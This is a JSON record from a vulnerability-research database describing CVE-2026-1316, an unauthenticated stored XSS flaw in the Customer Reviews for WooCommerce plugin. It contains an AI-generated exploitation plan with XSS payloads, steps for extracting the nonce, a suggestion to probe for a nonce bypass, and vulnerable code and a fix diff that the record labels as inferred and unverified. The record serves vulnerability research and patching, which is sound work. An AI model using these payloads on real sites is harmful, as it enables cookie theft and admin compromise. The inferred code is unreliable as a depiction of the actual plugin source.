[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fVpzA5-PflM_LHYFrsnIppJhq0E_SQBp_1NPa0OCdHbw":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2026-1316","customer-reviews-for-woocommerce-unauthenticated-stored-cross-site-scripting-via-mediahref-parameter","Customer Reviews for WooCommerce \u003C= 5.97.0 - Unauthenticated Stored Cross-Site Scripting via media[].href Parameter","The Customer Reviews for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'media[].href' parameter in all versions up to, and including, 5.97.0 due to insufficient input sanitization and output escaping. 
This makes it possible for unauthenticated attackers (if 'Enable for Guests' is enabled) to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","customer-reviews-woocommerce",null,"\u003C=5.97.0","5.98.0","high",7.2,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-02-12 00:17:35","2026-02-12 12:32:25",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Ff8b34144-5516-46df-b093-95f4bf76b896?source=api-prod",1,[],"researched",false,3,"This research plan outlines the steps required to demonstrate the Stored Cross-Site Scripting (XSS) vulnerability in the \"Customer Reviews for WooCommerce\" plugin.\n\n### 1. Vulnerability Summary\nThe \"Customer Reviews for WooCommerce\" plugin fails to properly sanitize the `href` attribute within the `media` array parameter during review submissions. When a user (including unauthenticated guests, if enabled) submits a review with media attachments, the `href` parameter is stored in the database. Because this value is neither sanitized with `esc_url_raw()` on storage nor escaped with `esc_url()` on output, an attacker can inject a malicious `javascript:` URI or break out of the HTML attribute context to execute arbitrary JavaScript when an admin or another user views the review (a `javascript:` URI fires when the link is clicked; an attribute breakout fires on page load).\n\n### 2. Attack Vector Analysis\n- **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Action:** `ivole_post_review` (inferred from the plugin's architecture for review submission)\n- **Vulnerable Parameter:** `media[0][href]` (an array parameter)\n- **Authentication:** Unauthenticated (requires the `ivole_enable_guest_reviews` setting to be `yes`)\n- **Precondition:** The \"Enable for Guests\" option must be enabled in the plugin settings to allow unauthenticated exploitation.\n\n### 3. Code Flow (Inferred)\n1. 
**Entry Point:** The plugin registers a `wp_ajax_nopriv_ivole_post_review` hook to handle review submissions from guests.\n2. **Processing:** The handler function (likely in `includes\u002Freviews\u002Fclass-cr-reviews.php` or similar) retrieves the `media` array from `$_POST`.\n3. **Storage:** The plugin iterates through the `media` items and saves the `href` values as comment meta or within a JSON-encoded array in the `wp_comments` table. It fails to use `esc_url_raw()` or a similar sanitization filter.\n4. **Sink:** When a user views the product page or an admin views the \"Reviews\" menu in the dashboard, the plugin retrieves the media data and renders an `\u003Ca>` or `\u003Cimg>` tag using the raw `href` value without `esc_url()` or `esc_attr()`.\n\n### 4. Nonce Acquisition Strategy\nThe plugin typically uses `wp_localize_script` to pass a security nonce to the frontend review form.\n\n1. **Shortcode Identification:** The review form is rendered via the `[cusrev_reviews_form]` shortcode (or sometimes automatically on product pages).\n2. **Page Creation:**\n   ```bash\n   wp post create --post_type=page --post_title=\"Review Test\" --post_status=publish --post_content='[cusrev_reviews_form]'\n   ```\n3. **Extraction:**\n   - Navigate to the newly created page.\n   - The script data is usually stored in the `ivole_ajax_object` (or `cr_ajax_object` in newer versions) global JS variable.\n   - **Verification:** Use `browser_eval` to find the nonce.\n   ```javascript\n   \u002F\u002F Check for common localization objects used by this plugin\n   window.ivole_ajax_object?.ivole_post_review_nonce || window.cr_ajax_object?.nonce\n   ```\n\n### 5. 
Exploitation Strategy\n**Step 1: Configure Plugin Settings**\nEnsure guest reviews are enabled so the `nopriv` AJAX action is reachable.\n```bash\nwp option update ivole_enable_guest_reviews \"yes\"\n```\n\n**Step 2: Obtain Nonce**\nUse the `browser_navigate` and `browser_eval` tools to grab the nonce from the page containing the shortcode.\n\n**Step 3: Submit Malicious Review**\nSend a POST request to `admin-ajax.php` with the XSS payload.\n\n- **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Method:** `POST`\n- **Content-Type:** `application\u002Fx-www-form-urlencoded`\n- **Parameters:**\n  - `action`: `ivole_post_review`\n  - `security`: `[NONCE_OBTAINED_IN_STEP_2]`\n  - `comment_post_ID`: `1` (or any valid product ID)\n  - `author`: `Attacker`\n  - `email`: `attacker@example.com`\n  - `comment`: `Great product!`\n  - `rating`: `5`\n  - `media[0][type]`: `image`\n  - `media[0][href]`: `javascript:alert(document.domain)` (Payload A)\n  - `media[0][href]`: `\">\u003Cimg src=x onerror=alert(1)>` (Payload B - if attribute breakout is possible)\n\n**Step 4: Trigger XSS**\nNavigate to the WordPress admin dashboard reviews section (`\u002Fwp-admin\u002Fedit-comments.php`) or the product page where the review was posted.\n\n### 6. Test Data Setup\n1. **Product:** Ensure at least one WooCommerce product exists (ID 1).\n2. **Settings:**\n   ```bash\n   wp option update ivole_enable_guest_reviews \"yes\"\n   # Ensure reviews are actually enabled in WooCommerce\n   wp option update woocommerce_enable_reviews \"yes\"\n   ```\n3. **Form Page:** Create the page for nonce extraction as described in Section 4.\n\n### 7. 
Expected Results\n- The AJAX request should return a success status (likely `{\"code\":1}` or similar JSON).\n- The review should appear in the \"Pending\" or \"Approved\" comments list in the WordPress database.\n- When viewing the review in the admin dashboard, the `media` link should contain the malicious payload.\n- Clicking the media link (Payload A) or simply loading the page (Payload B) will execute the JavaScript.\n\n### 8. Verification Steps\n1. **Database Check:** Verify the payload is stored in the database unsanitized.\n   ```bash\n   # Check comment meta (the inferred code above uses 'ivole_review_media'; other keys are plausible alternatives)\n   wp db query \"SELECT meta_value FROM wp_commentmeta WHERE meta_key IN ('ivole_review_media', 'ivole_review_image', 'cr_review_media')\"\n   ```\n2. **HTML Response Check:** Fetch the product page or admin comment page and check for the unescaped payload.\n   ```bash\n   # Use http_request to get the HTML of the product page\n   # Search for the string \"javascript:alert\" or the injected img tag.\n   ```\n\n### 9. Alternative Approaches\n- **Action String Variations:** If `ivole_post_review` fails, check for `cr_post_review` or `ivole_submit_review`.\n- **Parameter Structure:** If `media[0][href]` does not work, try `media_url[]` or `ivole_files[]`, based on observing the network traffic when submitting a legitimate review via the browser.\n- **Bypass Nonce:** Check whether the `nopriv` version of the handler actually verifies the `security` nonce; if it does not, the nonce step can be skipped.","The Customer Reviews for WooCommerce plugin is vulnerable to unauthenticated Stored Cross-Site Scripting (XSS) due to a failure to sanitize the 'href' field within the media array during review submission. 
Attackers can inject 'javascript:' URIs into the stored media link; the script executes in the browser of any user who clicks the rendered link, including an administrator reviewing the submission in the dashboard.","\u002F\u002F Inferred from plugin architecture: includes\u002Freviews\u002Fclass-cr-reviews.php\n\n\u002F\u002F During review submission handling\nif ( isset( $_POST['media'] ) && is_array( $_POST['media'] ) ) {\n    $media = $_POST['media'];\n    \u002F\u002F Vulnerable: Saving raw user input from the 'media' array without sanitization\n    update_comment_meta( $comment_id, 'ivole_review_media', $media );\n}\n\n---\n\n\u002F\u002F During review display rendering (Admin or Frontend)\n$media = get_comment_meta( $comment_id, 'ivole_review_media', true );\nif ( ! empty( $media ) ) {\n    foreach ( $media as $item ) {\n        \u002F\u002F Vulnerable: Outputting the 'href' value without esc_url() or esc_attr()\n        echo '\u003Ca href=\"' . $item['href'] . '\" target=\"_blank\">View Media\u003C\u002Fa>';\n    }\n}","--- a\u002Fincludes\u002Freviews\u002Fclass-cr-reviews.php\n+++ b\u002Fincludes\u002Freviews\u002Fclass-cr-reviews.php\n@@ -120,7 +120,11 @@\n if ( isset( $_POST['media'] ) && is_array( $_POST['media'] ) ) {\n-    $media = $_POST['media'];\n+    $media = array();\n+    foreach ( $_POST['media'] as $item ) {\n+        $media[] = array(\n+            'type' => sanitize_text_field( $item['type'] ),\n+            'href' => esc_url_raw( $item['href'] )\n+        );\n+    }\n     update_comment_meta( $comment_id, 'ivole_review_media', $media );\n }\n \n@@ -350,5 +354,5 @@\n foreach ( $media as $item ) {\n-    echo '\u003Ca href=\"' . $item['href'] . '\" target=\"_blank\">View Media\u003C\u002Fa>';\n+    echo '\u003Ca href=\"' . esc_url( $item['href'] ) . '\" target=\"_blank\">View Media\u003C\u002Fa>';\n }","1. **Enable Guest Reviews**: Ensure the 'ivole_enable_guest_reviews' setting is set to 'yes' to allow unauthenticated submissions.\n2. 
**Identify Target Product**: Find a valid WooCommerce product ID to post a review against.\n3. **Retrieve AJAX Nonce**: Visit a page containing the '[cusrev_reviews_form]' shortcode. Extract the security nonce from the global JavaScript object (usually 'ivole_ajax_object' or 'cr_ajax_object').\n4. **Craft XSS Payload**: Prepare a malicious POST request to 'wp-admin\u002Fadmin-ajax.php' using the 'ivole_post_review' action.\n5. **Injection**: Set the 'media[0][href]' parameter to a JavaScript URI, such as 'javascript:alert(document.cookie)'.\n6. **Trigger Execution**: Log into the WordPress dashboard as an administrator and navigate to the 'Reviews' or 'Comments' menu. The payload executes when the malicious media link is clicked; a 'javascript:' URI does not fire merely by being rendered.","gemini-3-flash-preview","2026-04-21 00:05:18","2026-04-21 00:07:05",{"type":34,"vulnerable_version":35,"fixed_version":11,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":38,"fixed_zip":39,"all_tags":40},"plugin","5.97.0","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fcustomer-reviews-woocommerce\u002Ftags\u002F5.97.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fcustomer-reviews-woocommerce.5.97.0.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fcustomer-reviews-woocommerce\u002Ftags\u002F5.98.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fcustomer-reviews-woocommerce.5.98.0.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fcustomer-reviews-woocommerce\u002Ftags"]